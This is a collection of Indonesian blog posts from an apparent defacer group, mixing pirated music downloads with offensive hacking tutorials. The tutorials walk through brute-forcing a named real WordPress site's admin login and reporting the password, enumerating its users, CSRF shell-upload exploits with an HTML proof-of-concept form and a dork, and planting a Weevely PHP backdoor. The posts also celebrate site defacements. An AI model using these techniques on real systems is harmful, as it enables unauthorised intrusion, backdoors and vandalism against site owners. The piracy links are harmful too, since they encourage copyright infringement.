Download 4th Single JKT48 - Manatsu Sounds Good ! + MV

Kali ini saya akan share Single terbaru JKT48 yaitu Manatsu Sounds Good . Just share, buat yang gak mampu beli albumnya :p . gak usah protes :p . Oke langsung saja ya :D

Berikut list nya :

JKT48 - 01. Manatsu no Sounds Good! - Musim Panas Sounds Good!

JKT48 - 02. BINGO!

JKT48 - 03. Kimi to Boku no Kankei - Hubungan Kau Dan Aku

JKT48 - 04. Manatsu no Sounds Good! - Summer Love Sounds Good! (English Ver.)

MV JKT48 - Manatsu no Sounds Good! - Musim Panas Sounds Good!



nah, untuk file musik nya silahkan download di sini Download Full Album Manatsu no Sounds Good JKT48

Password RAR : madura-cyber

Sementara untuk MV nya silahkan download disini Download MV JKT48 - Manatsu no Sounds Good !



Oke, sekian postingan kali ini, semoga bermanfaat ;)

Hack Wordpress Dengan Python Wordpress BruteForce

Kali ini saya akan share tutorial bruteforce Wordpress dengan Python :D

Cukup mudah tapi butuh kesabaran :)

Oke langsung saja ikuti langkah-langkahnya :

Sebelumnya, jika sobat menggunakan Windows, harus terinstall Python Trelebih dahulu :D

Setelah itu, copas script berikut dan save dengan formay .py

Tools Python Wordpress BruteForce

Wordlist yang diletakkan satu folder dengan File Python nya.

Untuk wordlist bisa cari sendiri atau pakai punya saya

Wordlists by Nabilaholic404



Setelah itu, tentukan target. Terserah mau acak atau mau pentest web yang sudah ditentukan.

Ketahui dulu user yang digunakan di website tersebut, agar nanti proses bruteforce tidak sia-sia. Untuk mengetahui daftar user di web target bisa kalian scan dengan Flunym0us. Untuk yang belum tau, baca tentang flunym0us di :

Flunym0us, Vulnerability Scanner for Wordpress and Moodle



Sebagai bahan tutorial, target saya adalah http://www.adriannecurry.org/

Setelah di cek dengan Flunym0us, user dari web tersebut adalah "adamjohn" . Jadi saat melakukan bruteforce user yang kita masukkan adalah "adamjohn"



Oke, langsung saja ke step yang pertama.

nb : saya meletakkan file python nya di C:\tools\wpbf.py



Buka CMD

Ketik cd\tools

lalu ketik command berikut :

[namafile].py -h http://[situstarget]/wp-login.php -u [username -P [wordlist].txt

Contoh :

wpbf.py -h http://www.adriannecurry.org/wp-login.php -u adamjohn -P akicha.txt

Tunggu proses bruteforce selesai. kadang lama, kadang cepet, kadang gagal . Berdoa saja :v

Nah, tuh udah finish ! :v

Username : adamjohn

Password : michael123



Kita coba login di webnya :

http://www.adriannecurry.org/wp-login.php



Dan dorrrr !! Welcome to Admin Page :p

Kalo sudah seperti itu ja terserah mau diapan :p

kalo lagi iseng ya pasang shell, hajar index nya :v

http://www.adriannecurry.org owned :p

Mirror





Berikut tutorial upload shell di wordpress :

Cara Upload Shell di Wordpress Lewat Theme Editor

Tutorial Upload Shell di Wordpress via Plugins Editor

Flunym0us, Vulnerability Scanner for Wordpress and Moodle

Kali ini saya share tools yang biasa digunakan untuk melakukan scan pada web CMS Wordpress dan Moodle.

Mungkin sudah banyak sih yang tau, namanya Flunym0us. Yang udah tau lewat aja, yang belum tau monggo disimak :p

Pengenalan :

Flunym0us adalah Vulnerability Scanner pada situs Wordpress dan Moodle yang dibuat oleh Flu Project Team.

Tools ini berbasis python. jadi yang pakek Windows harus install Python dulu. :D



Pengoperasian :



-h, --help: Show this help message and exit

-wp, --wordpress: Scan WordPress site

-mo, --moodle: Scan Moodle site

-H HOST, --host HOST: Website to be scanned

-w WORDLIST, --wordlist WORDLIST: Path to the wordlist to use

-t TIMEOUT, --timeout TIMEOUT: Connection timeout

-r RETRIES, --retries RETRIES: Connection retries

-p PROCESS, --process PROCESS: Number of process to use

-T THREADS, --threads THREADS: Number of threads (per process) to use





Fitur :



[+] http user-agent hijacking

[+] http referer hijacking

[+] Search Wordpress Version

[+] Search Wordpress Latest Version

[+] Search Version of Wordpress Plugins

[+] Search Latest Version of Wordpress Plugins

[+] Search Path Disclosure Vulnerabilities

[+] Search Wordpress Authors



Kek gini nih tampilannya :

Fiturnya banyak kan ? :D

nah, salah satu fitur favorit ane adalah Search Wordpress Authors.

Kali ini saya akan menjelaskan fitur tersebut :D

Kesalahan yang kadang dilakukan oleh para attacker ketika melakukan bruteforce adalah asal ngisi username. kadang mereka asal isi dengan "admin" . Iya kalo usernya admin, kalo enggak, buang-buang waktu doang kan :p .

Sebagai contoh liat ss dibawah :

Ketika dimasukkan user "admin" , hasilnya invalid :p

Kalo misalmau dibruteforce pake user "admin" hasilnya tetap nihil kan :v

Makanya harus di scan dulu :D

Buka Flunym0us .

Caranya :

Disini ane meletakkan tools nya di C:\tools\scanwp\sc.py < file nya ane beri nama sc.py

Buka CMD

Ketik cd\tools\scanwp

Ketik lagi sc.py

maka Flunym0us akan terbuka.

Command nya adalah

[namafile].py -H http://[situstarget]/ -wp -w wp-plugins.lst -t 60 -r 1 -p 2 -T 2



Contoh:

sc.py -H http://www.adriannecurry.org/ -wp -w wp-plugins.lst -t 60 -r 1 -p 2 -T 2



Dan tunggu proses scanning :p

Siip. Darisitu kita tau authornya adalah "adamjohn"

Coba kita test di websitenya :

User "adamjohn" valid .

kalo mau bruteforce berarti usernamenya "adamjohn" bukan "admin" :p



bagaimana ? Tertarik ?

kalo tertarik kalian bisa download Di Sini

Untuk fitur-fitur lain silahkan coba-coba sendiri.



Oke, sekian tutor kali ini :p

Maaf kalau tutornya kepanjangan, saya hanya berusaha biar yang belum paham cepet paham.

Jika ada yang belum jelas, silahkan komentar :D

Download 400+ Foto Aki Takajo JKT48

Kali ini saya mau share Pict oshi saya di JKT48. Siapa lagi kalo bukan Akicha . Mungkin ada yang butuh :p

Langsung saja ya. Ini jumlah fotonya ada 400 lebih, atau tepatnya 407 foto.



Ane kasih sedikit deh preview nya :v

Udah itu aja.

Kalo mau download semuanya klik aja link dibawah :v

Download 400+ Pict Aki Takajo JKT48



Sekian dan semoga bermanfaat

Internet Gratis Dengan VPN Di PC Laptop Dan HP Android

Assalamualaikum...

VPN adalah singkatan dari Virtual Private Network, yang berarti adalah jalur khusus atau private untuk mengakses internet dari jaringan publik. Namun VPN membuat koneksi terlihat sebagai "anonymous atau tanpa identitas" di internet. VPN memberikan keleluasaan dalam mengakses internet dan juga membuat koneksi lebih stabil. Jadi dengan memanfaatkan jaringan tersebut kita bisa menggunakannya untuk akses internet secara gratis tanpa pulsa dan tanpa kuota. mari kita simak aja :)

Status : Testes & Worked for Provider 3 AoN, XL dan Telkomsel via HP & Laptop

Khusus HP Android (Rooted)

Donwload | DroidVPN

Register | Here

Pertama sobat diharuskan mendaftar dulu untuk mendapatkan akun free.

Kemudian Install DroidVPN di perangkat Android sobat lalu jalankan aplikasinya. dan login akun yg sudah sobat daftarkan tadi.

Untuk selengkapnya silahkan Baca Disini


Khusus PC / Laptop

PD-Proxy | Download

Seperti sebelumnya, sobat diharuskan mendaftar akunnya terlebih dahulu..

Kemudian install aplikasinya dan jalankan.. jika ada muncul perintah buat install driver, iyakan aja :) silahkan masukan username dan password sobat :)

Untuk Selengkapnya silahkan Baca Disini

Manfaat Menggunakan VPN

Keamanan - VPN memberikan tingkat keamanan tertinggi menggunakan enkripsi canggih dan protokol otentikasi yang melindungi data dari akses yang tidak sah.

Anonymous Surfing - VPN membuat akses internet secara anonim dan mengamankan koneksi Internet dengan memberikan alamat ip baru sehingga terhindar dari pelacakan,

WiFi Security - Keamanan akses internet di Area Hotspot sehingga lalu lintas data tidak bisa dicuri, atau dimanipulasi karena data terencripsi..

Untuk Trik Internet Gratis lainnya klik DISINI

Sekian saja, moga bermanfaat :)

UPDATE : TRIK SUDAH TIDAK BISA DIGUNAKAN LAGI

Content Creator : Onix AQua

Download Album Avril Lavigne | Avril Lavigne New Album 2013

Hallo semuanya :D

Assalamualaikum :D

Hampir seminggu tidak posting karena banyak tugas sekolah dan juga latihan senam untuk nilai praktek olahraga :( . Oke, kali ini saya akan share Album terbaru Avril yaitu "Avril Lavigne" .Udah lama sih punya, cuman ya baru sempet share soalnya ya itu tadi, banyak tugas. Wakakakakaka :v

Di album ini ada tigabelas lagu.

Berikut tracklistnya :

1. Avril Lavigne � Rock n Roll


2. Avril Lavigne � Here�s to Never Growing Up


3. Avril Lavigne � 17


4. Avril Lavigne � Bitchin� Summer


5. Avril Lavigne � Let Me Go Ft. Chad Kroeger


6. Avril Lavigne � Give You What You Like


7. Avril Lavigne � Bad Girl Ft. Marilyn Manson


8. Avril Lavigne � Hello Kitty


9. Avril Lavigne � You Ain�t Seen Nothin� Yet


10. Avril Lavigne � Sippin� On Sunshine


11. Avril Lavigne � Hello Heartache


12. Avril Lavigne � Falling Fast


13. Avril Lavigne � Hush Hush

Yang mau download, ini link nya :

Download Album Avril Lavigne | Avril Lavigne New Album 2013

Sekian dan semoga bermanfaat :D

Woocommerce Custom Tshirt Desginer CSRF Shell Upload Vulnerability

Oke, kali ini saya mau share exploit yang baru ditemukan kemarin yaitu Woocommerce Custom Tshirt Desginer CSRF Shell Upload Vulnerability. caranya cukup mudah kok. Langsung saja ikuti tutorialnya :

Bahan-bahan :



HTML Exploiter Download Disini | save dengan format .html



Vulnerability :

[localhost]/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/upload.php

Dork :

use your brain bitch :p

Shell Location :

[localhost]/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/uploadImage/[randomname].php



Langkah-langkah :

Oke, langsung saja nyelem ke google nyari target vuln. :p

Contoh target saya adalah http://mbrinformatique.com/

Ubah url nya menjadi

http://mbrinformatique.com/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/upload.php

Jika error, berarti vuln :D

Langkah kedua, buka HTML Exploiter diatas dan edit bagian http://127.0.0.1/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/upload.php dengan web yang vuln.

save kembali lalu buka lewat browser. :p

nah tuh, upload shell nya lewat situ. maka kalo sudah sukses kalian akan mendapatkan nama acak. Misal :

1384522165528621b5f41fe.php

maka letak shell kalian ada di

[localhost]/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/uploadImage/[randomname].php



Contoh :

http://mbrinformatique.com/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/uploadImage/1384522165528621b5f41fe.php

Kalo sudah seperti ituya terserah mau diapain -_-

http://mbrinformatique.com/devil.html

Mirror



Thanks to founder of this exploit :

Bebyyers404 | JKT48 CYBER TEAM - Black Devil Crew



Sekian tutorial kali ini semoga bermanfaat :)

Cara Mengupload Database Lama di Hostingan Baru | Import Database

Hallo, assalamualaikum :D

Kali ini saya akan share tutorial sederhana cara mengupload database lama di hostinagn baru :). Saya asumsikan, sobat sudah mengupload file-file / komponen yang ada di public_html. Jadi tutor saya ini langsung ke bagaimana cara mengupload database lama ke hostingan yang baru.

Dimulai dari membackup database dari hostingan lama.

Oke, pertama, sobat masuk cPanel, lalu klik menu phpMyAdmin

maka sobat akan dibawa ke halaman phpMyAdmin .

langkah selanjutnya adalah, pilih database yang akan dibackup, lalu klik ekspor. Lihat gambar :

Pilih saja opsi minimum. Toh hasilnya sama saja sih :|

lalu klik kirim. Otomatis database akan didownload :D

Sampai disini, proses backup selesai. Tinggal masuk ke step baru yaitu upload db di hostingan yang baru :D

Untuk membuktikan kalo saya benar-benar mengupload nya di hostingan baru, saya akan coba upload di idhostinger :p

Menunya sama kok kayak cPanel biasa :D . Klik Database MySQL .

Buat db baru, nama dan password harus diingat :D

Langkah selanjutnya adalah Buat Database baru 

Mungkin kalo di hostngan ber cPanel, anda harus membuat database dan database user secara terpisah, tapi saya yakin anda bisa. Sama kok. :D

Oke, selanjutnya adalah pergi ke phpMyAdmin.

Next

Lalu kilk Impor

lalu upload backupan database yang tadi sudah didownload :D

Tinggal tunggu proses upload selesai :D

Proses upload tergantung besarnya kapasitas database. makin besar ya makin lama :D

Dan...

jebrettt !!!

Impor database sukses :D

Sekarang tinggal menyesuaikan file config.php nya dengan nama database dan user serta password yang telah dibuat di langkah awal saat mengimpor database.



Sekian tutorial cupu dari saya, semoga bermanfaat ;)

Happy Birthday Nabilah Ratna Ayu Azalia

"Selamat ulang tahun ya Nabilah Ratna Ayu Azalia.

Semoga diusiamu yang ke 14 tahun ini semakin tambah dewasa.

Semakin disayang orang tua, semakin sukses dan semakin kece tentunya :).

Sukses Buat JKT48, Sukses juga buat karirmu :)."



Maaf telat ngucapin. :p . Kemarin kan blog ini ditutup :v. Banyak berita simpang siur memang. Banyak yang mengira www.madura-cyber.org kena hack . Itu tidak masuk akal >.< . Blogspot mana ada bug nya :v . Ini memang janji saya sendiri kalo nabilah ultah mau nutup blog sehari penuh :D .

Udah di mirrorin kok. :D

Belum diverif sih, tapi mudah mudahan diveriif sama zone-h :)

Mirror

Yang mau lihat tampilan full page nya Madura-Cyber kemarin kayak apa :

Full Page Mirror



Sekian.

#?HBD14thQueenUsagiJKT48

Indonesia, 11 November 2013

WordPress Army Knife CSRF File Upload Vulnerability

Exploit Title: WordPress Army Knife CSRF File Upload Vulnerability

Author: Bebyyers404

Date: 11/09/2013

Vendor Homepage: http://freelancewp.co



Themes Link: http://freelancewp.com/wordpress-theme/army-knife/

Infected File: upload-handler.php

Category: webapps/php

Google dork: inurl:/wp-content/themes/armyknife

Tested on : Windows/Linux



Exploit & POC :

 

<form enctype="multipart/form-data"

action="http://127.0.0.1/wordpress/wp-content/themes/armyknife/functions/upload-handler.php" method="post">

Please choose a file: <input name="uploadfile" type="file" /><br />

<input type="submit" value="upload" />

</form>

 

File path:

http://127.0.0.1/wordpress/wp-content/uploads/[year]/[month]/yourshell.php





./Nabilaholic404, ./Bebyyers404, ./Panda Dot ID, ./Tsunaomi48, ./Pscript ./Mbah-Rowo



JKT48 CYBER TEAM & Black Devils Crew

Download Eminem ft Rihanna - The Monster (Album The Marshall Mathers LP2)

Kali ini saya akan share salah satu lagu dari Eminem ft  Rihanna berjudul The Monster. Sebenarnya ini dari Album barunya Eminem sih, tapi ane kurang suka Eminem, cuma suka rihanna nya. Jadi yang ane ambil cuma yang ft Rihanna nya :p



langsung aja mumpung masih anget, mungkin bentar lagi kena cobyright alias diblock ni lagi dari 4shared soalnya album nya baru rilis beberapa hari yang lalu :)



Download Eminem ft Rihanna - The Monster (Album The Marshall Mathers LP2)



Sekian postingan kalo ini, semoga bermanfaat

Java Cyber Army [www.javacyberarmy.org] Got Hacked ?

Bangun tidur eh lagi rame kalo forum yang baru kemarin diinstall JAVA CYBER ARMY kena deface . :D . dari pesan yang ditinggalkan, si attacker tampak menyindir tim yang sedang naik daun ini karena terkesan terlalu mengekspos diri ke media. Sama sekali tidak menunjukkan sifat sebagai kelompok "underground" .

Berikut ss yang berhasil saya ambil dari www.javacyberarmy.org/forum/index.php :

Dan untuk mirrornya bisa kalian lihat di sini :

http://zone-h.org/mirror/id/21148522



Sampai berita ini diturunkan, forum masih dalam keadaan terdeface :)

Hacker Indonesia Protes Atas Aksi Spying Yang Dilakukan Australia Terhadap Indonesia

dalam seminggu terakhir memang sedang gencar pemberitaan tentang aksi penyadapan (spying) yang dilakukan oleh Amerika terhadap Indonesia. Namun ternyata tidak hanya Amerika, Australia juga terlibat dalam aksi Spying tersebut. Hal ini tentu membuat geram seluruh rakyat Indonesia, tak terkecuali para Aktifis Underground (baca : hacker).

Aksi protes pun dilakukan dengan mengadakan deface besar-besaran terhadap situs-situs Australia khususnya yang berdomain .au (australia). Pesan yang disampaikan rata-rata sama : Stop Spying on Indonesian !!

Berikut adalah tampilan beberapa website Australia yang diretas oleh Defacer Indonesia :

Hacked by L1tleblackst4r

Hacked by Jingklong

Hacked by AgamBastard

Hacked by xCrotZ

Sebenarnya masih banyak. Itu hanya sebagian :)

Sekian berita yang dapat saya sampaikan, semoga bermanfaat :D

Backconnect dengan Weevely [ Back|Track 5 R3 ]

Assalamualaikum sobat IDCA, kesempatan kali ini kami akan memberikan tutorial "Back connect" dengan Weevely untuk netcat nanti tutorialnya bisa menyusul. Sebelum melangkah ke tutorialnya kita berkenalan dulu dengan backconnect itu sendiri :D .


Apa itu backconnect ?
Backconnect biasanya digunakan untuk server yg tertutup proxy atau firewall. sehingga tidak bisa di lakukan remote connect. Jadi salah satu triknya adalah membalik koneksi, yaitu mengkoneksikan dari server ke komputer kita.

Oke, sudah sedikit jelas kan? kita lanjut ke tutorial heheh untuk pengguna windows harus instal  module python-redline dulu jika ingin menggunakan weevely ^_^

Bahan-bahan :

1. PC / Laptop yang terkoneksi dengan Internet
2. Website yang sudah ditanam shell
3. File Backdoor

Langkah-langkahnya :

1. Buka terminal ( atau tekan CTRL + ALT + T ) , lalu ketikan

cd /pentest/backdoors/web/weevely/" kemudian tekan enter ( Tampilan )

 2. Setelah itu kita buat backdoors dulu dengan cara, ketik :

./weevely.py generate [ namafile.php ] , contoh : "./weevely.py generate 0000 bim.php" ( Tampilan )

3. Jika sudah dibuat maka akan muncul tulisan "[generate.php] Backdoor file 'bim.php' created with password '0000'." sekarang coba cek filenya di dir/folder "pentest/backdoors/web/weevely"

4. Sekarang tinggal upload file tersebut ke web yang akan kita back connect.

5. Jika sudah berhasil di upload sekarang kembali ke terminal tadi, lalu ketikan :

./weevely.py [url file backdoors] [password]" sebagai contoh :

./weevely.py http://bimo-cyber.com/tmp/bim.php 0000  ( Tampilan )

Selamat sekarang anda sudah terhubung ke server target, nah untuk tutorial rooting saya bagis setelah dapat WIFI ya hehehe. Jika ada yang kurang jelas silahkan tanyakan di grup kami aja ya, jangan lewat INBOX :)

Jika ada masalah seputar tutorial yg ada disini sobat bisa tanyakan dan diskusikan di forum kami http://forum.idca.or.id/

Author : Bimo Septiawan